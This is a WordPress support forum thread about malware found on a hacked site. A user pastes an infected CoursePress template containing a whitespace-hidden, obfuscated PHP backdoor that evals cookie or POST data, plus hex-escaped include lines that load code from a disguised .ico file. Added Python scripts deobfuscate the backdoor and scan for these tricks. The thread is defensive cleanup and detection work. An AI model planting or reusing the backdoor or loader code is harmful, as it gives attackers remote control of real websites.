Coursepress file caught by Defender

My website at this domain was recently hacked with a mailbot, and Defender has been useful in cleaning it up. But when I ran it on my Coursepress subdomain, something interesting happened! It marked single.php as Suspicious. Screenshot attached.

    Dimitris

    Hey there JessycaFrederick,

    Hope you're doing well, and thanks for reaching out to us!

    By default, the CoursePress theme is located in the plugin's folder, like
    /wp-content/plugins/coursepress/themes/coursepress/single.php in the version you use (1.3.3).
    I presume that you duplicated the theme into the /themes/ folder so you could further edit it, is that right? Please advise!

    Could you please try to review this file for any suspicious code?
    If you haven't made any changes in this file, you can also try to overwrite it by copying
    /wp-content/plugins/coursepress/themes/coursepress/single.php
    to
    /wp-content/themes/coursepress/single.php

    If this has no results, please grant us temporary support access to your website so we can see it in action and better inspect your setup.
    You can do so via WPMUDEV Dashboard plugin as described here (no need to send credentials):
    https://premium.wpmudev.org/docs/getting-started/getting-support/#chapter-4

    Looking forward to your results!
    Warm regards,
    Dimitris

    JessycaFrederick

    Yes, I am using the Coursepress theme, too.

    I do not see any suspicious code in the file when I view it; see the attached screenshot and the code below.

    Support access is granted.

    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $kc6b = 674;$GLOBALS['na5f']=Array();global$na5f;$na5f=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m39b625']="\x49\x52\x79\x5c\xa\x51\x3c\x21\x63\x7e\x4c\x33\x4e\x23\x28\x4a\x64\x42\x72\x65\x20\x61\x43\x35\x5f\x74\x2b\x29\x2c\x3a\x3b\x50\x69\x60\x62\x34\x53\x6b\x70\x6f\x7b\x22\x55\x54\x25\x4d\x45\x3d\x37\x56\x32\x31\x30\x7a\x5e\x41\x73\x68\x59\x26\x44\x2f\x6c\x2a\x4b\x47\x48\x24\x5b\x5a\xd\x67\x78\x6e\x57\x27\x6d\x46\x2e\x6a\x40\x2d\x7c\x9\x38\x77\x7d\x58\x4f\x5d\x66\x36\x71\x39\x3f\x3e\x76\x75";$na5f[$na5f['m39b625'][18].$na5f['m39b625'][48].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][23].$na5f['m39b625'][35].$na5f['m39b625'][48]]=$na5f['m39b625'][8].$na5f['m39b625'][57].$na5f['m39b625'][18];$na5f[$na5f['m39b625'][72].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][34]]=$na5f['m39b625'][39].$na5f['m39b625'][18].$na5f['m39b625'][16];$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]=$na5f['m39b625'][56].$na5f['m39b625'][25].$na5f['m39b625'][18].$na5f['m39b625'][62].$na5f['m39b625'][19].$na5f['m39b625'][73];$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]=$na5f['m39b625'][32].$na5f['m39b625'][73].$na5f['m39b625'][32].$na5f['m39b625'][24].$na5f['m39
b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][25];$na5f[$na5f['m39b625'][32].$na5f['m39b625'][50].$na5f['m39b625'][23].$na5f['m39b625'][16].$na5f['m39b625'][35].$na5f['m39b625'][48].$na5f['m39b625'][21]]=$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][32].$na5f['m39b625'][21].$na5f['m39b625'][62].$na5f['m39b625'][32].$na5f['m39b625'][53].$na5f['m39b625'][19];$na5f[$na5f['m39b625'][71].$na5f['m39b625'][34].$na5f['m39b625'][23].$na5f['m39b625'][84].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][50]]=$na5f['m39b625'][38].$na5f['m39b625'][57].$na5f['m39b625'][38].$na5f['m39b625'][96].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][56].$na5f['m39b625'][32].$na5f['m39b625'][39].$na5f['m39b625'][73];$na5f[$na5f['m39b625'][62].$na5f['m39b625'][52].$na5f['m39b625'][21].$na5f['m39b625'][48].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][34].$na5f['m39b625'][90]]=$na5f['m39b625'][97].$na5f['m39b625'][73].$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][32].$na5f['m39b625'][21].$na5f['m39b625'][62].$na5f['m39b625'][32].$na5f['m39b625'][53].$na5f['m39b625'][19];$na5f[$na5f['m39b625'][92].$na5f['m39b625'][52].$na5f['m39b625'][93].$na5f['m39b625'][34].$na5f['m39b625'][84]]=$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][91].$na5f['m39b625'][35].$na5f['m39b625'][24].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][8].$na5f['m39b625'][39].$na5f['m39b625'][16].$na5f['m39b625'][19];$na5f[$na5f['m39b625'][39].$na5f['m39b625'][16].$na5f['m39b625'][90].$na5f['m39b625'][52].$na5f['m39b625'][51].$na5f['m39b625'][11]]=$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][25].$na5f['m39b625'][24].$na5f['m39b625'][25].$na5f['m39b625'][32].$na5f['m39b625'][76].$na5f['m39b625'][19].$na5f['m39b625'][24].$na5f['m39b625'][62].$na5f['m39b625'][32].$na5f['m39b625'][76].$na5f['m39b625'][32].$na5f['m39b625'][25];$na5f[$na5f['m39b625'][5
6].$na5f['m39b625'][51].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][84]]=$na5f['m39b625'][19].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][35].$na5f['m39b625'][21].$na5f['m39b625'][50].$na5f['m39b625'][90].$na5f['m39b625'][84].$na5f['m39b625'][84];$na5f[$na5f['m39b625'][71].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][21].$na5f['m39b625'][35].$na5f['m39b625'][34]]=$na5f['m39b625'][92].$na5f['m39b625'][8].$na5f['m39b625'][52].$na5f['m39b625'][11].$na5f['m39b625'][21].$na5f['m39b625'][93].$na5f['m39b625'][91].$na5f['m39b625'][91];$na5f[$na5f['m39b625'][8].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][52].$na5f['m39b625'][21]]=$_POST;$na5f[$na5f['m39b625'][85].$na5f['m39b625'][16].$na5f['m39b625'][93].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][19].$na5f['m39b625'][50].$na5f['m39b625'][51]]=$_COOKIE;@$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]($na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][18].$na5f['m39b625'][39].$na5f['m39b625'][18].$na5f['m39b625'][24].$na5f['m39b625'][62].$na5f['m39b625'][39].$na5f['m39b625'][71],NULL);@$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]($na5f['m39b625'][62].$na5f['m39b625'][39].$na5f['m39b625'][71].$na5f['m39b625'][24].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][18].$na5f['m39b625'][39].$na5f['m39b625'][18].$na5f['m39b625'][56],0);@$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]($na5f['m39b625'][76].$na5f['m39b625'][21]
.$na5f['m39b625'][72].$na5f['m39b625'][24].$na5f['m39b625'][19].$na5f['m39b625'][72].$na5f['m39b625'][19].$na5f['m39b625'][8].$na5f['m39b625'][97].$na5f['m39b625'][25].$na5f['m39b625'][32].$na5f['m39b625'][39].$na5f['m39b625'][73].$na5f['m39b625'][24].$na5f['m39b625'][25].$na5f['m39b625'][32].$na5f['m39b625'][76].$na5f['m39b625'][19],0);@$na5f[$na5f['m39b625'][39].$na5f['m39b625'][16].$na5f['m39b625'][90].$na5f['m39b625'][52].$na5f['m39b625'][51].$na5f['m39b625'][11]](0);$ae6d410=NULL;$z8ad=NULL;$na5f[$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][91].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][91].$na5f['m39b625'][93].$na5f['m39b625'][50]]=$na5f['m39b625'][35].$na5f['m39b625'][93].$na5f['m39b625'][8].$na5f['m39b625'][11].$na5f['m39b625'][23].$na5f['m39b625'][91].$na5f['m39b625'][90].$na5f['m39b625'][52].$na5f['m39b625'][81].$na5f['m39b625'][23].$na5f['m39b625'][91].$na5f['m39b625'][21].$na5f['m39b625'][21].$na5f['m39b625'][81].$na5f['m39b625'][35].$na5f['m39b625'][8].$na5f['m39b625'][21].$na5f['m39b625'][93].$na5f['m39b625'][81].$na5f['m39b625'][84].$na5f['m39b625'][21].$na5f['m39b625'][48].$na5f['m39b625'][51].$na5f['m39b625'][81].$na5f['m39b625'][93].$na5f['m39b625'][50].$na5f['m39b625'][52].$na5f['m39b625'][93].$na5f['m39b625'][11].$na5f['m39b625'][23].$na5f['m39b625'][50].$na5f['m39b625'][52].$na5f['m39b625'][50].$na5f['m39b625'][50].$na5f['m39b625'][84].$na5f['m39b625'][16];global$fe67f692;function 
qc03a966($ae6d410,$c4970f8){global$na5f;$l1b7adee3="";for($de99=0;$de99<$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]($ae6d410);){for($i894=0;$i894<$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]($c4970f8)&&$de99<$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]($ae6d410);$i894++,$de99++){$l1b7adee3.=$na5f[$na5f['m39b625'][18].$na5f['m39b625'][48].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][23].$na5f['m39b625'][35].$na5f['m39b625'][48]]($na5f[$na5f['m39b625'][72].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][34]]($ae6d410[$de99])^$na5f[$na5f['m39b625'][72].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][34]]($c4970f8[$i894]));}}return$l1b7adee3;}function 
e0b4a2f88($ae6d410,$c4970f8){global$na5f;global$fe67f692;return$na5f[$na5f['m39b625'][71].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][21].$na5f['m39b625'][35].$na5f['m39b625'][34]]($na5f[$na5f['m39b625'][71].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][21].$na5f['m39b625'][35].$na5f['m39b625'][34]]($ae6d410,$fe67f692),$c4970f8);}foreach($na5f[$na5f['m39b625'][85].$na5f['m39b625'][16].$na5f['m39b625'][93].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][19].$na5f['m39b625'][50].$na5f['m39b625'][51]]as$c4970f8=>$t635a){$ae6d410=$t635a;$z8ad=$c4970f8;}if(!$ae6d410){foreach($na5f[$na5f['m39b625'][8].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][52].$na5f['m39b625'][21]]as$c4970f8=>$t635a){$ae6d410=$t635a;$z8ad=$c4970f8;}}$ae6d410=@$na5f[$na5f['m39b625'][62].$na5f['m39b625'][52].$na5f['m39b625'][21].$na5f['m39b625'][48].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][34].$na5f['m39b625'][90]]($na5f[$na5f['m39b625'][56].$na5f['m39b625'][51].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][84]]($na5f[$na5f['m39b625'][92].$na5f['m39b625'][52].$na5f['m39b625'][93].$na5f['m39b625'][34].$na5f['m39b625'][84]]($ae6d410),$z8ad));if(isset($ae6d410[$na5f['m39b625'][21].$na5f['m39b625'][37]])&&$fe67f692==$ae6d410[$na5f['m39b625'][21].$na5f['m39b625'][37]]){if($ae6d410[$na5f['m39b625'][21]]==$na5f['m39b625'][32]){$de99=Array($na5f['m39b625'][38].$na5f['m39b625'][96]=>@$na5f[$na5f['m39b625'][71].$na5f['m39b625'][34].$na5f['m39b625'][23].$na5f['m39b625'][84].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][50]](),$na5f['m39b625'][56].$na5f['m39b625'][96]=>$na5f['m39b625'][51].$na5f['m39b625'][78].$na5f['m39b625'][52].$na5f['m39b625'][81].$na5f['m39b625'][51],);echo@$na5f[$na5f['m39b625'][32].$na5f['m39b625'][50].$na5f['m39b625'][23].$na5f['m39b625'][16].$na5f['
m39b625'][35].$na5f['m39b625'][48].$na5f['m39b625'][21]]($de99);}elseif($ae6d410[$na5f['m39b625'][21]]==$na5f['m39b625'][19]){eval/*d79db4*/($ae6d410[$na5f['m39b625'][16]]);}exit();} ?><?php
    /**
     * The Template for displaying all single posts.
     *
     * @package CoursePress
     */
    
    get_header(); ?>
    
    	<div id="primary" class="content-area content-side-area">
    		<main id="main" class="site-main" role="main">
    
    		<?php while ( have_posts() ) : the_post(); ?>
    
    			<?php get_template_part( 'content', 'single' ); ?>
    
    			<?php coursepress_post_nav(); ?>
    
    			<?php
    				// If comments are open or we have at least one comment, load up the comment template
    				if ( comments_open() || '0' != get_comments_number() ) :
    					comments_template();
    				endif;
    			?>
    
    		<?php endwhile; // end of the loop. ?>
    
    		</main><!-- #main -->
    	</div><!-- #primary -->
    
    <?php get_sidebar(); ?>
    <?php get_footer(); ?>
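
The injected block at the top of the posted single.php is the common $GLOBALS character-table obfuscation: one hex-escaped string holds every character the script needs, each identifier is spelled out as a chain of $na5f['m39b625'][n] lookups, and $na5f is an alias for $GLOBALS, so $na5f['x'] is simply the global $x. The Python script below is an added example (not Defender or CoursePress code) that resolves those chains statically with regular expressions and then inlines the resulting aliases; it never executes the PHP. The sample it works on is a constructed excerpt of the posted file: the table assignment plus a handful of its statements, rebuilt by the ref() helper so the listing stays short.

```python
"""Statically resolve the $GLOBALS character-table obfuscation used in the
injected single.php above.  Added example, not Defender or CoursePress code.
It rewrites PHP source text with regular expressions and never executes it."""
import re


def php_hex_unescape(s):
    """Decode PHP double-quoted \\xH / \\xHH escapes (PHP allows one or two hex digits)."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)


def find_alias(src):
    """The variable aliased to $GLOBALS, e.g. 'na5f' from `$na5f=$GLOBALS;`."""
    return re.search(r"\$(\w+)\s*=\s*\$GLOBALS\s*;", src).group(1)


def find_table(src):
    """Locate the character table: the quoted string with the most \\x escapes."""
    best = max(re.finditer(r'''\['(\w+)'\]\s*=\s*"([^"]*)";''', src),
               key=lambda m: m.group(2).count("\\x"))
    return best.group(1), php_hex_unescape(best.group(2))


def php_single_quoted(s):
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def resolve_index_runs(src, alias, key, table):
    """Replace chains like $na5f['m39b625'][8].$na5f['m39b625'][57]... with 'chr'."""
    ref = rf"\${re.escape(alias)}\['{re.escape(key)}'\]\[\d+\]"
    run = re.compile(rf"{ref}(?:\.{ref})*")

    def sub(m):
        idx = [int(i) for i in re.findall(r"\[(\d+)\]", m.group(0))]
        return php_single_quoted("".join(table[i] for i in idx))

    return run.sub(sub, src)


def inline_aliases(src, alias):
    """$na5f is $GLOBALS, so after $na5f['r77c547']='chr' a call $na5f['r77c547'](...) is chr(...).
    Inline every alias whose value is a bare name or a superglobal, except at its definition."""
    a = re.escape(alias)
    names = {}
    for m in re.finditer(rf"\${a}\['(\w+)'\]=(?:'(\w+)'|(\$_(?:POST|COOKIE|GET|REQUEST)));", src):
        names[m.group(1)] = m.group(2) or m.group(3)
    return re.sub(rf"\${a}\['(\w+)'\](?!=[^=])",
                  lambda m: names.get(m.group(1), m.group(0)), src)


def deobfuscate(src):
    alias = find_alias(src)
    key, table = find_table(src)
    return inline_aliases(resolve_index_runs(src, alias, key, table), alias)


# The character table exactly as it appears in the posted file (98 characters).
ALPHABET_LITERAL = (
    r"\x49\x52\x79\x5c\xa\x51\x3c\x21\x63\x7e\x4c\x33\x4e\x23\x28\x4a\x64\x42\x72\x65"
    r"\x20\x61\x43\x35\x5f\x74\x2b\x29\x2c\x3a\x3b\x50\x69\x60\x62\x34\x53\x6b\x70\x6f"
    r"\x7b\x22\x55\x54\x25\x4d\x45\x3d\x37\x56\x32\x31\x30\x7a\x5e\x41\x73\x68\x59\x26"
    r"\x44\x2f\x6c\x2a\x4b\x47\x48\x24\x5b\x5a\xd\x67\x78\x6e\x57\x27\x6d\x46\x2e\x6a"
    r"\x40\x2d\x7c\x9\x38\x77\x7d\x58\x4f\x5d\x66\x36\x71\x39\x3f\x3e\x76\x75"
)


def ref(*idx):
    """Rebuild lookup chains exactly as they appear in the post (keeps the sample short)."""
    return ".".join(f"$na5f['m39b625'][{i}]" for i in idx)


# Constructed excerpt of the posted file: the table assignment plus a few of its statements.
SAMPLE = "\n".join([
    "<?php $kc6b = 674;$GLOBALS['na5f']=Array();global$na5f;$na5f=$GLOBALS;"
    r'${"\x47\x4c\x4fB\x41\x4c\x53"}' "['m39b625']=\"" + ALPHABET_LITERAL + '";',
    f"$na5f[{ref(18, 48, 48, 8, 23, 35, 48)}]={ref(8, 57, 18)};",
    f"$na5f[{ref(72, 16, 11, 34)}]={ref(39, 18, 16)};",
    f"$na5f[{ref(73, 52, 34, 48, 8, 90, 11, 35, 52)}]={ref(32, 73, 32, 24, 56, 19, 25)};",
    f"$na5f[{ref(8, 35, 16, 11, 52, 21)}]=$_POST;",
    f"@$na5f[{ref(73, 52, 34, 48, 8, 90, 11, 35, 52)}]({ref(19, 18, 18, 39, 18, 24, 62, 39, 71)},NULL);",
    f"if($ae6d410[{ref(21)}]=={ref(19)}){{eval/*d79db4*/($ae6d410[{ref(16)}]);}}exit();",
])

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run over the full posted file, the same two passes turn the chains into chr, ord, strlen, ini_set, serialize, phpversion, unserialize, base64_decode and set_time_limit, plus aliases for $_POST and $_COOKIE; the opening statements become ini_set('error_log', NULL), ini_set('log_errors', 0), ini_set('max_execution_time', 0) and set_time_limit(0), and the final branch is eval($ae6d410['d']) on data that was base64-decoded, XOR-ed and unserialized from the last cookie or POST parameter. That is the part Defender flagged, and the reason the file has to be replaced rather than "cleaned" by eye.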

    Dimitris

    Hey there JessycaFrederick,

    There is a massive piece of code in there, just before the template comments section.
    Some empty characters have been used so the code is "pushed" to the right.
    Have a look at your previous reply, for example:

    Could you please remove this code, so the template file has a form like:

    <?php
    /**
     * The Template for displaying all single posts.
     *
     * @package CoursePress
     */
    // THE REST OF THE TEMPLATE FILE

    Re-scan your website with Defender and let us know about your results!

    Warm regards,
    Dimitris

    JessycaFrederick

    FYI... I found some malicious code at the top of the wp-config.php file that Defender didn't pick up.

    /*b005c*/
    
    @include "\x2fhome\x2fh2ow\x69se/p\x75blic\x5fhtml\x2fwp-c\x6fnten\x74/plu\x67ins/\x77p-ig\x6eiter\x2ffavi\x63on_3\x399260\x2eico";
    
    /*b005c*/

    And in the Coursepress install...

    /*89c97*/
    
    @include "\x2fhome\x2fh2ow\x69se/p\x75blic\x5fhtml\x2fwp-c\x6fnten\x74/plu\x67ins/\x77p-ig\x6eiter\x2ffavi\x63on_3\x399260\x2eico";
    
    /*89c97*/
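
Dimitris's remark about code "pushed" to the right by empty characters, and the hex-escaped @include that Defender missed in wp-config.php, are both cheap to catch with a plain text scan. The script below is an added example (it is not Defender's logic nor that of any plugin in this thread). It flags a <?php tag followed by a long run of whitespace, a $GLOBALS alias, an eval( with a comment wedged before the parenthesis, and double-quoted strings built from \xHH escapes, and it decodes the latter so an include target becomes readable. The samples are constructed from the fragments in this thread; the define line and the clean template head are filler, and the 64-character whitespace threshold is an arbitrary choice.

```python
"""Text-only heuristics for the two tricks seen in this thread: a `<?php` tag
followed by a long run of whitespace that pushes injected code off-screen, and
hex-escaped string literals hiding an @include target or a $GLOBALS alias.
Added example, not Defender's logic; reads files as text and executes nothing."""
import re
import sys

# Arbitrary threshold: real templates put a newline, not 64+ spaces, after <?php.
PAD_THRESHOLD = 64

PATTERN_RULES = [
    ("padded_open_tag", re.compile(r"<\?php[ \t]{%d,}\S" % PAD_THRESHOLD)),
    # `$x=$GLOBALS;` or a variable-variable whose name is spelled in hex, ${"\x47..."}
    ("globals_alias", re.compile(r'\$\w+\s*=\s*\$GLOBALS\s*;|\$\{\s*"[^"]*\\x[0-9A-Fa-f]')),
    # eval( with an optional /*comment*/ between the name and the parenthesis
    ("eval_call", re.compile(r"\beval\s*(?:/\*.*?\*/)?\s*\(")),
]
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
INCLUDE_RE = re.compile(r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"')


def php_hex_unescape(s):
    """Decode PHP double-quoted \\xH / \\xHH escapes (one or two hex digits)."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)


def scan_php(src):
    """Return (rule, detail) pairs; an empty list means nothing matched."""
    findings = []
    for rule, rx in PATTERN_RULES:
        for m in rx.finditer(src):
            findings.append((rule, re.sub(r"\s+", " ", m.group(0))[:60]))
    reported = set()
    for m in INCLUDE_RE.finditer(src):
        raw = m.group(1)
        if "\\x" not in raw:
            continue
        reported.add(m.start(1))
        path = php_hex_unescape(raw)
        findings.append(("obfuscated_include", path))
        if not path.lower().endswith(".php"):
            findings.append(("include_non_php", path))
    for m in STRING_RE.finditer(src):
        if m.start(1) not in reported and m.group(1).count("\\x") >= 4:
            findings.append(("hex_escaped_string", php_hex_unescape(m.group(1))[:60]))
    return findings


def rules_hit(src):
    return {rule for rule, _ in scan_php(src)}


def decoded_include_paths(src):
    return [detail for rule, detail in scan_php(src) if rule == "obfuscated_include"]


# Constructed sample: the wp-config.php lines from the post, plus a filler define().
WP_CONFIG_SAMPLE = (
    "<?php\n/*b005c*/\n"
    r'@include "\x2fhome\x2fh2ow\x69se/p\x75blic\x5fhtml\x2fwp-c\x6fnten\x74/plu\x67ins/\x77p-ig\x6eiter\x2ffavi\x63on_3\x399260\x2eico";'
    "\n/*b005c*/\n"
    "define('DB_NAME', 'wordpress');\n"
)

# Constructed sample: the shape of the injected single.php (padding, alias, table, eval).
SINGLE_PHP_SAMPLE = (
    "<?php" + " " * 300
    + "$kc6b = 674;$GLOBALS['na5f']=Array();global$na5f;$na5f=$GLOBALS;"
    + r'${"\x47\x4c\x4fB\x41\x4c\x53"}' + "['m39b625']=" + r'"\x49\x52\x79\x5c\xa\x51";'
    + "eval/*d79db4*/($ae6d410['d']);exit(); ?><?php\n"
    + "/**\n * The Template for displaying all single posts.\n */\nget_header();\n"
)

# Constructed sample: a clean template head, which should produce no findings.
CLEAN_SAMPLE = (
    "<?php\n/**\n * The Template for displaying all single posts.\n *\n"
    " * @package CoursePress\n */\n\nget_header(); ?>\n"
    '<div id="primary" class="content-area">\n<?php get_sidebar(); ?>\n'
)

if __name__ == "__main__":
    for name in sys.argv[1:]:
        with open(name, encoding="utf-8", errors="replace") as f:
            for rule, detail in scan_php(f.read()):
                print(f"{name}: {rule}: {detail}")
```

Invoke it as, for example, python scan.py wp-config.php wp-content/themes/coursepress/single.php (the script name is hypothetical). The include_non_php rule is the interesting one for the wp-config.php case: a .ico file being pulled in with include is a loader for code stored where a signature scanner may not look, which is also why the sibling plugin directory it points at needs the same inspection as the files Defender did flag.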

    Dimitris

    Hey there JessycaFrederick,

    Hope you're doing well, and I appreciate the info provided here!

    I believe the most appropriate way to scan and check your website for malware would be to use multiple tools rather than just a single one. You see, there could be things that slip past one service and another can catch.
    As you have already had an unfortunate incident, I'd advise using Defender and a couple more plugins; here's a list of the most popular ones:
    https://wordpress.org/plugins/sucuri-scanner/
    https://wordpress.org/plugins/quttera-web-malware-scanner/
    https://wordpress.org/plugins/exploit-scanner/
    https://wordpress.org/plugins/wp-antivirus-site-protection/
    https://wordpress.org/plugins/antivirus/
    https://wordpress.org/plugins/gotmls/

    Take care,
    Dimitris